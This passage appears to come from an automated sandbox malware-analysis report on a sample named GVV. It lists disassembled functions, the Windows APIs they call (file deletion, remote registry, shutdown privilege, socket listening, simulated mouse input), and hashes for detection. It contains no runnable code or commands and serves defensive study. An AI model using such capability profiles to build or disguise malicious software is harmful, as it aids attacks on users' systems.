                • Opcode Fuzzy Hash: d7de3fb32d8600918ca75445c70637e104f9c888270ede788a44752b21acb726
                • Instruction Fuzzy Hash: C131A4326412197EDF14EFB4DC49AEE77ACAF4A320F184156F815E2191EB34DE848F94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 001897BE
                • FindNextFileW.KERNEL32(00000000,?), ref: 00189819
                • FindClose.KERNEL32(00000000), ref: 00189824
                • FindFirstFileW.KERNEL32(*.*,?), ref: 00189840
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00189890
                • SetCurrentDirectoryW.KERNEL32(001D6B7C), ref: 001898AE
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 001898B8
                • FindClose.KERNEL32(00000000), ref: 001898C5
                • FindClose.KERNEL32(00000000), ref: 001898D5
                  • Part of subcall function 0017DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0017DB00
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                • String ID: *.*
                • API String ID: 2640511053-438819550
                • Opcode ID: d581cacaed04675afe57595a18f61817a4d3b16e38453ad5fe4d387c589d2a7c
                • Instruction ID: 064708573c1c93dfb7c35a34a4556df1af8edc297421abb2a07367a56f77f145
                • Opcode Fuzzy Hash: d581cacaed04675afe57595a18f61817a4d3b16e38453ad5fe4d387c589d2a7c
                • Instruction Fuzzy Hash: 7931A13160061E6EDF10AFB4EC48AEE77ADAF07324F184166E854A2191DB30DE848FA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0019BE44 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0019C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0019B6AE,?,?), ref: 0019C9B5
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019C9F1
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA68
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA9E
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0019BF3E
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0019BFA9
                • RegCloseKey.ADVAPI32(00000000), ref: 0019BFCD
                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0019C02C
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0019C0E7
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0019C154
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0019C1E9
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0019C23A
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0019C2E3
                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0019C382
                • RegCloseKey.ADVAPI32(00000000), ref: 0019C38F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                • String ID:
                • API String ID: 3102970594-0
                • Opcode ID: a7272459ee02edae22398f952e1d88138ee1e43e2db19bbf3e3d45569b144dfb
                • Instruction ID: 3b3cc0d60b28e07e3c3e417f16c2e7ee64d638360f946462b839d783c427b676
                • Opcode Fuzzy Hash: a7272459ee02edae22398f952e1d88138ee1e43e2db19bbf3e3d45569b144dfb
                • Instruction Fuzzy Hash: 3C025E716042009FDB14DF28C895E2ABBE5FF49314F1984ADF48ACB2A2D731ED45CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00188195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                Download Yara Rule
                APIs
                • GetLocalTime.KERNEL32(?), ref: 00188257
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00188267
                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00188273
                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00188310
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00188324
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00188356
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0018838C
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00188395
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CurrentDirectoryTime$File$Local$System
                • String ID: *.*
                • API String ID: 1464919966-438819550
                • Opcode ID: 33d06938c3bf24ba871320b6ab4287cd03d4bbaba1aefdf7ba629b34b076dc69
                • Instruction ID: 5815347096710b43d4e257a04f5b73b7830225ef7e513109cdc7bb94239495f2
                • Opcode Fuzzy Hash: 33d06938c3bf24ba871320b6ab4287cd03d4bbaba1aefdf7ba629b34b076dc69
                • Instruction Fuzzy Hash: 0E617D715043059FCB14EF64D8809AEB3E9FF99310F44892EF99987251EB31EA45CF92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00113AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00113A97,?,?,00112E7F,?,?,?,00000000), ref: 00113AC2
                  • Part of subcall function 0017E199: GetFileAttributesW.KERNEL32(?,0017CF95), ref: 0017E19A
                • FindFirstFileW.KERNEL32(?,?), ref: 0017D122
                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0017D1DD
                • MoveFileW.KERNEL32(?,?), ref: 0017D1F0
                • DeleteFileW.KERNEL32(?,?,?,?), ref: 0017D20D
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0017D237
                  • Part of subcall function 0017D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0017D21C,?,?), ref: 0017D2B2
                • FindClose.KERNEL32(00000000,?,?,?), ref: 0017D253
                • FindClose.KERNEL32(00000000), ref: 0017D264
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                • String ID: \*.*
                • API String ID: 1946585618-1173974218
                • Opcode ID: 1c543746a1130968794cd3406c157618de54c17133fb5dd3e40bed746a68cc05
                • Instruction ID: 249d4ed3855ed6294a9e54d1a8356b485800cebcc633c6c48e929514d675598a
                • Opcode Fuzzy Hash: 1c543746a1130968794cd3406c157618de54c17133fb5dd3e40bed746a68cc05
                • Instruction Fuzzy Hash: 82618031C0110D9FCF09EBE0E9929EDB7B5AF25300F648165E41A77192EB316F8ADB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                • String ID:
                • API String ID: 1737998785-0
                • Opcode ID: 24153c2e69e52cd6ee68103a9b4b90cf289cf7f002ff2d60a81be3e61374a94c
                • Instruction ID: 0ba3ca4efa7bd7a3ee26e6a0eceae3fc7df23a97e82624014efb25f086e319ba
                • Opcode Fuzzy Hash: 24153c2e69e52cd6ee68103a9b4b90cf289cf7f002ff2d60a81be3e61374a94c
                • Instruction Fuzzy Hash: F6419A75204611AFE324EF55D888B59BBE1EF45328F14C099E4198BBA2C735ED82CFD0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 001716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0017170D
                  • Part of subcall function 001716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0017173A
                  • Part of subcall function 001716C3: GetLastError.KERNEL32 ref: 0017174A
                • ExitWindowsEx.USER32(?,00000000), ref: 0017E932
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                • String ID: $ $@$SeShutdownPrivilege
                • API String ID: 2234035333-3163812486
                • Opcode ID: 11ef1f9b1ba556b5b10173260f20584e08cbc32cf3e21131a4d51c0c5f8d6d9f
                • Instruction ID: 13fefa59b1bec97063175a90715ec019feb0704ccbfbde8efaf926a7b3d360d8
                • Opcode Fuzzy Hash: 11ef1f9b1ba556b5b10173260f20584e08cbc32cf3e21131a4d51c0c5f8d6d9f
                • Instruction Fuzzy Hash: 0B01FE73610211BFEB5826789C85FBF72FC9718758F158462FE07E21D1D7A05C4086D0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00191204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                Download Yara Rule
                APIs
                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00191276
                • WSAGetLastError.WSOCK32 ref: 00191283
                • bind.WSOCK32(00000000,?,00000010), ref: 001912BA
                • WSAGetLastError.WSOCK32 ref: 001912C5
                • closesocket.WSOCK32(00000000), ref: 001912F4
                • listen.WSOCK32(00000000,00000005), ref: 00191303
                • WSAGetLastError.WSOCK32 ref: 0019130D
                • closesocket.WSOCK32(00000000), ref: 0019133C
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLast$closesocket$bindlistensocket
                • String ID:
                • API String ID: 540024437-0
                • Opcode ID: 9534c7840be6d7185cae541f43e6e352be85de5a9609a447a64b3316dd0262ca
                • Instruction ID: b2844605976bed82aaee557656fa849159e733df659a262f6bec3a7b004750fe
                • Opcode Fuzzy Hash: 9534c7840be6d7185cae541f43e6e352be85de5a9609a447a64b3316dd0262ca
                • Instruction Fuzzy Hash: B6417331600101AFDB14EF64D484B69BBE6BF46314F288198D8569F2D2C775EDC1CBE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 0014B9D4
                • _free.LIBCMT ref: 0014B9F8
                • _free.LIBCMT ref: 0014BB7F
                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,001B3700), ref: 0014BB91
                • WideCharToMultiByte.KERNEL32(00000000,00000000,001E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0014BC09
                • WideCharToMultiByte.KERNEL32(00000000,00000000,001E1270,000000FF,?,0000003F,00000000,?), ref: 0014BC36
                • _free.LIBCMT ref: 0014BD4B
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                • String ID:
                • API String ID: 314583886-0
                • Opcode ID: a31cfc6808c2c5d9f693d62228fc7121d4f32343781f376df0174733703db1fa
                • Instruction ID: eb85d6af63f4e84b98098842a537886d681a536d09b12fc70ae7284b335d6e61
                • Opcode Fuzzy Hash: a31cfc6808c2c5d9f693d62228fc7121d4f32343781f376df0174733703db1fa
                • Instruction Fuzzy Hash: FBC11671A08245AFDB249F69CCC1AAE7BB9EF51310F2441AAE594DB271E730DE41C750
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00113AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00113A97,?,?,00112E7F,?,?,?,00000000), ref: 00113AC2
                  • Part of subcall function 0017E199: GetFileAttributesW.KERNEL32(?,0017CF95), ref: 0017E19A
                • FindFirstFileW.KERNEL32(?,?), ref: 0017D420
                • DeleteFileW.KERNEL32(?,?,?,?), ref: 0017D470
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0017D481
                • FindClose.KERNEL32(00000000), ref: 0017D498
                • FindClose.KERNEL32(00000000), ref: 0017D4A1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                • String ID: \*.*
                • API String ID: 2649000838-1173974218
                • Opcode ID: 79d139cf2bff019e1fb6c1e8d18d06f5afc61f81b8dea65d4552642f87d45777
                • Instruction ID: 7f5dab3ed47acd3ba68eb6ff6ba3b8235c67df66f06e3733a3b8bed6556596d2
                • Opcode Fuzzy Hash: 79d139cf2bff019e1fb6c1e8d18d06f5afc61f81b8dea65d4552642f87d45777
                • Instruction Fuzzy Hash: A43172710083459BC304EF64D8559EF77F8BEA1314F44892EF4E653191EB30AA49C763
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: f16057342bca6c4a321d9427c01a307ef046ca838227fa43509691abffb416cf
                • Instruction ID: 14b0d34e7f034e11cff761f7e78ff6c4e3de371a53b3243b3896b16b84c6e434
                • Opcode Fuzzy Hash: f16057342bca6c4a321d9427c01a307ef046ca838227fa43509691abffb416cf
                • Instruction Fuzzy Hash: 8BC21872E046298FDB29CE28DD407EAB7B5FB48315F1541EAD84DE7250E774AE828F40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                Download Yara Rule
                APIs
                • _wcslen.LIBCMT ref: 001864DC
                • CoInitialize.OLE32(00000000), ref: 00186639
                • CoCreateInstance.OLE32(001AFCF8,00000000,00000001,001AFB68,?), ref: 00186650
                • CoUninitialize.OLE32 ref: 001868D4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateInitializeInstanceUninitialize_wcslen
                • String ID: .lnk
                • API String ID: 886957087-24824748
                • Opcode ID: e69bfdf743970960485ad2195f4bbf870e7eb5c5e8b3d33ad1fcbd63c392fce1
                • Instruction ID: 7af5b624201eb83a0db992ed11020af79c16529e71865df17c9a6aecf521c659
                • Opcode Fuzzy Hash: e69bfdf743970960485ad2195f4bbf870e7eb5c5e8b3d33ad1fcbd63c392fce1
                • Instruction Fuzzy Hash: 7BD14A715083019FC304EF24C891AABB7E8FFA9744F10496DF5958B291EB71EE46CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001922DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                Download Yara Rule
                APIs
                • GetForegroundWindow.USER32(?,?,00000000), ref: 001922E8
                  • Part of subcall function 0018E4EC: GetWindowRect.USER32(?,?), ref: 0018E504
                • GetDesktopWindow.USER32 ref: 00192312
                • GetWindowRect.USER32(00000000), ref: 00192319
                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00192355
                • GetCursorPos.USER32(?), ref: 00192381
                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001923DF
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                • String ID:
                • API String ID: 2387181109-0
                • Opcode ID: 267a2d327c724d11495ff4f45ccb4960f8f965c21c6180f410fd0d7442ecbec3
                • Instruction ID: 577f51f1174cfa3bb84db8c5874f60dcdc0220c84ef05a173273cf93bcc45856
                • Opcode Fuzzy Hash: 267a2d327c724d11495ff4f45ccb4960f8f965c21c6180f410fd0d7442ecbec3
                • Instruction Fuzzy Hash: 3031C272505315AFDB20DF54C849B9BB7E9FF89314F000919F98997191DB34EA48CBD2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00189B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00189B78
                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00189C8B
                  • Part of subcall function 00183874: GetInputState.USER32 ref: 001838CB
                  • Part of subcall function 00183874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00183966
                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00189BA8
                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00189C75
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                • String ID: *.*
                • API String ID: 1972594611-438819550
                • Opcode ID: f5b8b16930cacd70239bbca15fcc6980de572325bcc45b21245f793b1785cc23
                • Instruction ID: d8d7a7b5bf8ef29697e4c711216ed4b4cbe23da46118abfa26d533a05b4ae43c
                • Opcode Fuzzy Hash: f5b8b16930cacd70239bbca15fcc6980de572325bcc45b21245f793b1785cc23
                • Instruction Fuzzy Hash: 6C41637190420A9FCF15EF64C945AEE7BB4FF55310F184156E815A6191EB319F84CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0012997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00129A4E
                • GetSysColor.USER32(0000000F), ref: 00129B23
                • SetBkColor.GDI32(?,00000000), ref: 00129B36
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Color$LongProcWindow
                • String ID:
                • API String ID: 3131106179-0
                • Opcode ID: 7b1bd7d4832322ddb91c9aee93c4d9d3c73535949c02e5ebb555f7bb05524239
                • Instruction ID: e4820dc587760f44cd21935e0b1b126354799325443896489b0bae72942952ba
                • Opcode Fuzzy Hash: 7b1bd7d4832322ddb91c9aee93c4d9d3c73535949c02e5ebb555f7bb05524239
                • Instruction Fuzzy Hash: B6A10870208564BFE728AA3CAC98E7F369DEF43358F164109F502DB9D1CB259DA1D271
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00191806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0019304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0019307A
                  • Part of subcall function 0019304E: _wcslen.LIBCMT ref: 0019309B
                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0019185D
                • WSAGetLastError.WSOCK32 ref: 00191884
                • bind.WSOCK32(00000000,?,00000010), ref: 001918DB
                • WSAGetLastError.WSOCK32 ref: 001918E6
                • closesocket.WSOCK32(00000000), ref: 00191915
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
